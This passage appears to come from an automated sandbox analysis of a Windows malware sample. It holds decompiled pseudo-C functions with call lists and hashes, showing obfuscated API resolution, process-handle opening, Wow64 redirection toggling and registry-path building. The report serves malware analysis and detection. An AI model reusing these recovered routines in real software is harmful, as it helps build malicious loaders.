                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d1d34fdc338941d2982ab24f6a28c105f69f29f6357d08f3a95ab151b0ff7029
                                                                                                                                                                                                                                                                                    • Instruction ID: 52ea2018efedca95cc53e658dab8d9c24c1f7b3121d1e70abd8e140c83752291
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1d34fdc338941d2982ab24f6a28c105f69f29f6357d08f3a95ab151b0ff7029
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA314F32D00609AFDB11DFA8CD48ADFB7BAAF49300F148465ED14EB121DB719E46CB91
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00A771A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t35;
                                                                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t38;
                                                                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t41;
                                                                                                                                                                                                                                                                                    				intOrPtr _t44;
                                                                                                                                                                                                                                                                                    				struct HINSTANCE__* _t48;
                                                                                                                                                                                                                                                                                    				intOrPtr _t54;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t54 = E00A75C4E(0x20);
                                                                                                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 8;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t23 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    					_t1 = _t23 + 0xa7b11a; // 0x4c44544e
                                                                                                                                                                                                                                                                                    					_t48 = GetModuleHandleA(_t1);
                                                                                                                                                                                                                                                                                    					_t26 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    					_t2 = _t26 + 0xa7b787; // 0x7243775a
                                                                                                                                                                                                                                                                                    					_v8 = 0x7f;
                                                                                                                                                                                                                                                                                    					_t28 = GetProcAddress(_t48, _t2);
                                                                                                                                                                                                                                                                                    					 *(_t54 + 0xc) = _t28;
                                                                                                                                                                                                                                                                                    					if(_t28 == 0) {
                                                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                                                    						E00A72A03(_t54);
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t30 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    						_t5 = _t30 + 0xa7b774; // 0x614d775a
                                                                                                                                                                                                                                                                                    						_t32 = GetProcAddress(_t48, _t5);
                                                                                                                                                                                                                                                                                    						 *(_t54 + 0x10) = _t32;
                                                                                                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t33 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    							_t7 = _t33 + 0xa7b797; // 0x6e55775a
                                                                                                                                                                                                                                                                                    							_t35 = GetProcAddress(_t48, _t7);
                                                                                                                                                                                                                                                                                    							 *(_t54 + 0x14) = _t35;
                                                                                                                                                                                                                                                                                    							if(_t35 == 0) {
                                                                                                                                                                                                                                                                                    								goto L8;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t36 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    								_t9 = _t36 + 0xa7b756; // 0x4e6c7452
                                                                                                                                                                                                                                                                                    								_t38 = GetProcAddress(_t48, _t9);
                                                                                                                                                                                                                                                                                    								 *(_t54 + 0x18) = _t38;
                                                                                                                                                                                                                                                                                    								if(_t38 == 0) {
                                                                                                                                                                                                                                                                                    									goto L8;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									_t39 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    									_t11 = _t39 + 0xa7b7ac; // 0x6c43775a
                                                                                                                                                                                                                                                                                    									_t41 = GetProcAddress(_t48, _t11);
                                                                                                                                                                                                                                                                                    									 *(_t54 + 0x1c) = _t41;
                                                                                                                                                                                                                                                                                    									if(_t41 == 0) {
                                                                                                                                                                                                                                                                                    										goto L8;
                                                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                                                                                                                                                                                                                                                    										_t44 = E00A7225C(_t54, _a8);
                                                                                                                                                                                                                                                                                    										_v8 = _t44;
                                                                                                                                                                                                                                                                                    										if(_t44 != 0) {
                                                                                                                                                                                                                                                                                    											goto L8;
                                                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                                                    											 *_a12 = _t54;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
                                                                                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00A77852,?,?,?,?,00000000,00000000), ref: 00A771C8
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A771EA
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A77200
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A77216
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A7722C
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A77242
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7225C: memset.NTDLL ref: 00A722DB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressProc$AllocateHandleHeapModulememset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1886625739-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b1db082f61493b1f12f72ae7e6aa139fea4c51105947ab892c684cc2d2a54fcb
                                                                                                                                                                                                                                                                                    • Instruction ID: 47cf6ce0a2eb05cad79592e4c7171acc5b321ee2aeab5e061460edfc972e9d74
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1db082f61493b1f12f72ae7e6aa139fea4c51105947ab892c684cc2d2a54fcb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA21F7B150420AAFDB20DFA9CD44EAA77ECEB54380B01C165F91DC7222E731ED068BE0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                                                                    			E00A763CD(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                                                    				void _v60;
                                                                                                                                                                                                                                                                                    				char _v64;
                                                                                                                                                                                                                                                                                    				long _t18;
                                                                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                                                                    				intOrPtr _t23;
                                                                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                                                                    				intOrPtr _t30;
                                                                                                                                                                                                                                                                                    				intOrPtr _t31;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t30 = __edi;
                                                                                                                                                                                                                                                                                    				_t29 = _a4;
                                                                                                                                                                                                                                                                                    				_t31 = __eax;
                                                                                                                                                                                                                                                                                    				_t18 = E00A72BF3(_t29, __edi, __eax);
                                                                                                                                                                                                                                                                                    				_a4 = _t18;
                                                                                                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                                                                                                    					memset( &_v60, 0, 0x38);
                                                                                                                                                                                                                                                                                    					_t22 =  *0xa7a2d0; // 0x4aed5a8
                                                                                                                                                                                                                                                                                    					_v64 = 0x3c;
                                                                                                                                                                                                                                                                                    					if(_a8 == 0) {
                                                                                                                                                                                                                                                                                    						_t7 = _t22 + 0xa7b4e0; // 0x70006f
                                                                                                                                                                                                                                                                                    						_t23 = _t7;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t6 = _t22 + 0xa7b92c; // 0x750072
                                                                                                                                                                                                                                                                                    						_t23 = _t6;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v36 = _t31;
                                                                                                                                                                                                                                                                                    					_t32 = __imp__;
                                                                                                                                                                                                                                                                                    					_v52 = _t23;
                                                                                                                                                                                                                                                                                    					_v48 = _t29;
                                                                                                                                                                                                                                                                                    					_v44 = _t30;
                                                                                                                                                                                                                                                                                    					 *_t32(0);
                                                                                                                                                                                                                                                                                    					_push( &_v64);
                                                                                                                                                                                                                                                                                    					if( *0xa7a100() != 0) {
                                                                                                                                                                                                                                                                                    						_a4 = _a4 & 0x00000000;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_a4 = GetLastError();
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					 *_t32(1);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _a4;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72BF3: SysAllocString.OLEAUT32(?), ref: 00A72C4F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72BF3: SysAllocString.OLEAUT32(0070006F), ref: 00A72C63
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72BF3: SysAllocString.OLEAUT32(00000000), ref: 00A72C75
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72BF3: SysFreeString.OLEAUT32(00000000), ref: 00A72CD9
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00A763F1
                                                                                                                                                                                                                                                                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00A7642D
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A7643D
                                                                                                                                                                                                                                                                                    • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00A7644E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
• Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
• Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                                                                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                                                                                    • API String ID: 593937197-4251816714
                                                                                                                                                                                                                                                                                    • Opcode ID: 9d2cffbbf86a71307d37bfb5a063add060f00dde12467be5c36856243c1712e0
                                                                                                                                                                                                                                                                                    • Instruction ID: 09e4a5d597249db2ee71e90a4bf4801adbed567992b0c1c051f722a5bec389db
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d2cffbbf86a71307d37bfb5a063add060f00dde12467be5c36856243c1712e0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 311109B1900218AFDB10EFA9DD89BDE7BF8BB08384F04C026F909E7251D77499458BA5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00A72A18(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				void* _t2;
                                                                                                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                                                                                                    				void* _t5;
                                                                                                                                                                                                                                                                                    				long _t6;
                                                                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    				 *0xa7a2c4 = _t2;
                                                                                                                                                                                                                                                                                    				if(_t2 == 0) {
                                                                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                                                                                                    				if(_t4 <= 5) {
                                                                                                                                                                                                                                                                                    					_t5 = 0x32;
                                                                                                                                                                                                                                                                                    					return _t5;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				 *0xa7a2b4 = _t4;
                                                                                                                                                                                                                                                                                    				_t6 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                                    				 *0xa7a2b0 = _t6;
                                                                                                                                                                                                                                                                                    				 *0xa7a2bc = _a4;
                                                                                                                                                                                                                                                                                    				_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                                                                                                    				 *0xa7a2ac = _t7;
                                                                                                                                                                                                                                                                                    				if(_t7 == 0) {
                                                                                                                                                                                                                                                                                    					 *0xa7a2ac =  *0xa7a2ac | 0xffffffff;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00A7446F,?,?,00000001), ref: 00A72A20
                                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000001), ref: 00A72A2F
                                                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000001), ref: 00A72A3E
                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00A72A5B
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000001), ref: 00A72A7A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2270775618-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8adc3ef498fdc5eb6e408704acc53fa43a42ec3d2635db1d53798103c598b32a
                                                                                                                                                                                                                                                                                    • Instruction ID: e8c479c0db7d6b4a1300a4d49abc56325af8a598f8f9858ab7b84b887fcf461f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8adc3ef498fdc5eb6e408704acc53fa43a42ec3d2635db1d53798103c598b32a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F0F471695301AFD720CFA5AC09B5A3BB4B794781F10C52AE64EC52F1E67144838F5A
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                                                                    			E00A7202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                                                                    				signed int* _v16;
                                                                                                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				char* _t60;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                                                                    				intOrPtr _t65;
                                                                                                                                                                                                                                                                                    				char _t68;
                                                                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                                                                    				void* _t97;
                                                                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                                                                    				char _t104;
                                                                                                                                                                                                                                                                                    				signed int* _t106;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t107;
                                                                                                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t98 = __ecx;
                                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0xa7a38c);
					_t97 = 0x80000002;
					L6:
					_t60 = E00A733FA(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E00A74B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E00A72A03(_a8);
						goto L29;
					}
					_t65 =  *0xa7a2d0; // 0x4aed5a8
					_t16 = _t65 + 0xa7b908; // 0x65696c43
					_t68 = E00A733FA(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d00a790
						if(E00A75C15(_t103,  *_t33, _t97, _a8,  *0xa7a384,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xa7a2d0; // 0x4aed5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0xa7ba0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xa7b927; // 0x55434b48
								_t73 = _t34;
							}
							if(E00A7762C(_t73,  *0xa7a384,  *0xa7a388,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0xa7a2d0; // 0x4aed5a8
									_t44 = _t75 + 0xa7b893; // 0x74666f53
									_t78 = E00A733FA(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d00a790
										E00A733B7( *_t47, _t97, _a8,  *0xa7a388, _a24);
										_t49 = _t107 + 0x10; // 0x3d00a790
										E00A733B7( *_t49, _t97, _t105,  *0xa7a380, _a16);
										E00A72A03(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d00a790
									E00A733B7( *_t40, _t97, _a8,  *0xa7a388, _a24);
									_t43 = _t107 + 0x10; // 0x3d00a790
									E00A733B7( *_t43, _t97, _a8,  *0xa7a380, _a16);
								}
								if( *_t107 != 0) {
									E00A72A03(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d00a790
					if(E00A75419( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d00a790
							E00A75C15(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E00A72A03(_t106);
						_t104 = _a16;
					}
					E00A72A03(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E00A77973(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0xa7a38c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}

                                                                                                                                                                                                                                                                                    0x00a720f4
                                                                                                                                                                                                                                                                                    0x00a720fb
                                                                                                                                                                                                                                                                                    0x00a720fe
                                                                                                                                                                                                                                                                                    0x00a72148
                                                                                                                                                                                                                                                                                    0x00a72148
                                                                                                                                                                                                                                                                                    0x00a7215b
                                                                                                                                                                                                                                                                                    0x00a72165
                                                                                                                                                                                                                                                                                    0x00a7216d
                                                                                                                                                                                                                                                                                    0x00a72172
                                                                                                                                                                                                                                                                                    0x00a7217c
                                                                                                                                                                                                                                                                                    0x00a7217c
                                                                                                                                                                                                                                                                                    0x00a72174
                                                                                                                                                                                                                                                                                    0x00a72174
                                                                                                                                                                                                                                                                                    0x00a72174
                                                                                                                                                                                                                                                                                    0x00a72174
                                                                                                                                                                                                                                                                                    0x00a7219e
                                                                                                                                                                                                                                                                                    0x00a721a6
                                                                                                                                                                                                                                                                                    0x00a721d4
                                                                                                                                                                                                                                                                                    0x00a721d9
                                                                                                                                                                                                                                                                                    0x00a721e2
                                                                                                                                                                                                                                                                                    0x00a721e7
                                                                                                                                                                                                                                                                                    0x00a721eb
                                                                                                                                                                                                                                                                                    0x00a7221d
                                                                                                                                                                                                                                                                                    0x00a721ed
                                                                                                                                                                                                                                                                                    0x00a721fa
                                                                                                                                                                                                                                                                                    0x00a721fd
                                                                                                                                                                                                                                                                                    0x00a7220d
                                                                                                                                                                                                                                                                                    0x00a72210
                                                                                                                                                                                                                                                                                    0x00a72216
                                                                                                                                                                                                                                                                                    0x00a72216
                                                                                                                                                                                                                                                                                    0x00a721a8
                                                                                                                                                                                                                                                                                    0x00a721b5
                                                                                                                                                                                                                                                                                    0x00a721b8
                                                                                                                                                                                                                                                                                    0x00a721ca
                                                                                                                                                                                                                                                                                    0x00a721cd
                                                                                                                                                                                                                                                                                    0x00a721cd
                                                                                                                                                                                                                                                                                    0x00a72227
                                                                                                                                                                                                                                                                                    0x00a72233
                                                                                                                                                                                                                                                                                    0x00a72229
                                                                                                                                                                                                                                                                                    0x00a7222c
                                                                                                                                                                                                                                                                                    0x00a7222c
                                                                                                                                                                                                                                                                                    0x00a72227
                                                                                                                                                                                                                                                                                    0x00a7219e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a72165
                                                                                                                                                                                                                                                                                    0x00a7210d
                                                                                                                                                                                                                                                                                    0x00a72117
                                                                                                                                                                                                                                                                                    0x00a72119
                                                                                                                                                                                                                                                                                    0x00a7211e
                                                                                                                                                                                                                                                                                    0x00a72122
                                                                                                                                                                                                                                                                                    0x00a72124
                                                                                                                                                                                                                                                                                    0x00a7212f
                                                                                                                                                                                                                                                                                    0x00a72132
                                                                                                                                                                                                                                                                                    0x00a72132
                                                                                                                                                                                                                                                                                    0x00a72138
                                                                                                                                                                                                                                                                                    0x00a7213d
                                                                                                                                                                                                                                                                                    0x00a7213d
                                                                                                                                                                                                                                                                                    0x00a72143
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a72143
                                                                                                                                                                                                                                                                                    0x00a72048
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a7206f
                                                                                                                                                                                                                                                                                    0x00a7206f
                                                                                                                                                                                                                                                                                    0x00a7207b
                                                                                                                                                                                                                                                                                    0x00a7208e
                                                                                                                                                                                                                                                                                    0x00a72094
                                                                                                                                                                                                                                                                                    0x00a7209c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00a7209c

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(00A77319,0000005F,00000000,00000000,00000104), ref: 00A72061
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 00A7208E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A733FA: lstrlen.KERNEL32(?,00A7A380,73BB7FC0,00000000,00A72788,?,?,?,?,?,00A73EAC,?), ref: 00A73403
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A733FA: mbstowcs.NTDLL ref: 00A7342A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A733FA: memset.NTDLL ref: 00A7343C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A733B7: lstrlenW.KERNEL32(00A77319,?,?,00A72202,3D00A790,80000002,00A77319,00A7742D,74666F53,4D4C4B48,00A7742D,?,3D00A790,80000002,00A77319,?), ref: 00A733D7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72A03: HeapFree.KERNEL32(00000000,00000000,00A74072,00000000,?,?,00000000,?,?,?,?,?,?,00A744AE,00000000), ref: 00A72A0F
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 00A720B0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                                                                                                                                                                    • String ID: \
                                                                                                                                                                                                                                                                                    • API String ID: 3924217599-2967466578
                                                                                                                                                                                                                                                                                    • Opcode ID: cfd939cd2b644d4fda932d94f67e9b6acf79d4884efb945cbbe0c4f3f5a360ae
                                                                                                                                                                                                                                                                                    • Instruction ID: c79277df81895fe6d492ef93806b5d1ebf405c47addc88d7fc4e03e0813c17d1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfd939cd2b644d4fda932d94f67e9b6acf79d4884efb945cbbe0c4f3f5a360ae
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2251577650020ABFDF21DFA0DD41FEA37B9EB58300F10C524FA1996122D731DE56AB61
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                                                                    			E00A713B4(intOrPtr* __eax) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				WCHAR* _v12;
